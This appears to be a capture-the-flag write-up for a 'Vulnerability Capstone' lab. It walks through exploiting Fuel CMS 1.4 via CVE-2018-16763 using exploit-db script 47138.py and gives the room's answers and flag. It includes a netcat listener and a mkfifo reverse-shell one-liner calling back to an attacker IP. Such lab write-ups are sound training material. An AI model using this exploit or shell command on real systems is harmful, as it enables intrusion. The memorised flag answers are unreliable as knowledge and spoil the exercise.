Vulnerability Capstone
This guide contains the answer and steps necessary to get to them for the Vulnerability Capstone room.
Exploit the Machine (Flag Submission)
-
What is the name of the application running on the vulnerable machine?
The easiest first step to take is to navigate to the application through our browser.
Here we get the name as well as the version of the application.
Click for answer
Fuel CMS -
What is the version number of this application?
The answer we can find in the previous image.
Click for answer
1.4 -
What is the number of the CVE that allows an attacker to remotely execute code on this application?
To find any exploit for this specific version of Fuel CMS we can look it up on exploit-db. Here we see a CVE that we could use.
Click for answer
CVE-2018-16763
Use the resources & skills learnt throughout this module to find and use a relevant exploit to exploit this vulnerability.
Note: There are numerous exploits out there that can be used for this vulnerability (some more useful than others!)
-
What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.
Since we are on Kali and have searchsploit installed, we can use the exploit file on our system located at `usr/share/exploitdb/exploits/linux/webapps/47138.py'.
After some research it seems we need to modify the script since we are using Python 3. This will give us an error if we don't change anything.
Instead of using
urllib.quote, we must useurllib.parse.quote.I also changed the URL to reflect my attack machine and removed the proxy entry.
Now we can use this script to get our initial access to the vulnerable machine.
cmdpython3 47138.pyTo stabalize our shell we must first setup a Netcat listener with:
cmdnc -nlvp 1337Then we execute the following command our our shell:
cmdrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.18.78.136 1337 >/tmp/f
Now on our other terminal tab we can navigate the system to our flag.
Click for answer
THM{ACKME_BLOG_HACKED}